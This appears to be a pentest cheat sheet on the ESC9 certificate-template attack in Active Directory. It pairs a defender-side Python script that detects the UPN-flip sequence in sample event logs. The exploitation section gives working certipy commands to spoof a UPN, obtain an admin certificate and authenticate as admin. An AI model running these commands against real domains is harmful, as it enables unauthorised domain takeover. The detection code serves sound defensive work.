ESC9
ABOUT
ESC9 allows a user with GenericWrite (or equivalent control) over another domain user to impersonate any user (e.g., Domain Admin) by abusing a vulnerable certificate template that does not enforce UPN/SAN validation. The attacker temporarily changes the controlled user's UPN to the victim's (e.g., administrator), requests a certificate, and then reverts the UPN. The issued certificate allows authentication as the victim.
FLOW
We need two users: User1, who has GenericWrite, GenericAll, or WriteProperty over User2.
We change the UPN of User2 to that of User3 (the user we want to impersonate, e.g. the admin).
We request a certificate for User2; the CA issues it for the spoofed UPN because it does not validate it.
Then we revert the UPN of User2 to its original value.
Finally, we authenticate with the certificate.
EXPLOITATION
Temporarily set user2’s UPN to admin
certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn admin
Request certificate as user2 (with UPN = admin)
certipy req -username "user2@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -target ca.militech.local -ca militech-DC01-CA -template CertifiedAuthentication
Revert user2’s UPN back to original
certipy account update -username "user1@militech.local" -hashes "aad3b435b51404eeaad3b435b51404ee" -user user2 -upn "user2@militech.local"
Authenticate with the certificate as admin
certipy auth -pfx admin.pfx -domain militech.local -target 13.13.13.13
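As an added defender-side example (not part of this page or of Certipy): a small Python correlation that flags the UPN flip, certificate request, UPN revert sequence described above in constructed event records. The field names are my own shorthand; real Security event 4738 (user account changed, carries the new UPN) and CA event 4887 (certificate issued) records would need to be parsed into this shape first.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs). Field names are my own
# shorthand for the fields carried by Security event 4738 (user account
# changed, incl. new UPN) and CA event 4887 (certificate issued).
EVENTS = [
    {"ts": "2024-05-01T10:00:00", "id": 4738, "target": "user2", "upn": "admin"},
    {"ts": "2024-05-01T10:00:40", "id": 4887, "requester": "MILITECH\\user2",
     "template": "CertifiedAuthentication"},
    {"ts": "2024-05-01T10:01:10", "id": 4738, "target": "user2",
     "upn": "user2@militech.local"},
    {"ts": "2024-05-01T11:00:00", "id": 4738, "target": "user7",
     "upn": "user7@militech.local"},
]


def _acct(name):
    """Normalise 'DOMAIN\\user' or 'user' to a lowercase sAMAccountName."""
    return name.split("\\")[-1].lower()


def find_esc9_sequences(events, window=timedelta(minutes=10)):
    """Flag: UPN change on account X -> certificate issued to X -> UPN
    change on X again (the revert), all inside `window`. Issuance after a
    UPN change without a revert is still reported at lower confidence."""
    alerts = []
    events = sorted(events, key=lambda e: e["ts"])
    for i, e in enumerate(events):
        if e["id"] != 4738:
            continue
        acct, t0 = _acct(e["target"]), datetime.fromisoformat(e["ts"])
        issued = None
        for f in events[i + 1:]:
            if datetime.fromisoformat(f["ts"]) - t0 > window:
                break
            if f["id"] == 4887 and _acct(f["requester"]) == acct:
                issued = f
            elif issued and f["id"] == 4738 and _acct(f["target"]) == acct:
                alerts.append({"account": acct, "spoofed_upn": e["upn"],
                               "template": issued["template"],
                               "reverted_to": f["upn"], "confidence": "high"})
                issued = None
                break
        if issued:  # cert issued after a UPN change, but no revert observed
            alerts.append({"account": acct, "spoofed_upn": e["upn"],
                           "template": issued["template"],
                           "reverted_to": None, "confidence": "medium"})
    return alerts


if __name__ == "__main__":
    for alert in find_esc9_sequences(EVENTS):
        print(alert)
```

On real data, also treat a new UPN that matches an existing principal's name or lacks a domain suffix (as "admin" does here) as a signal in its own right, since legitimate UPN changes rarely look like that.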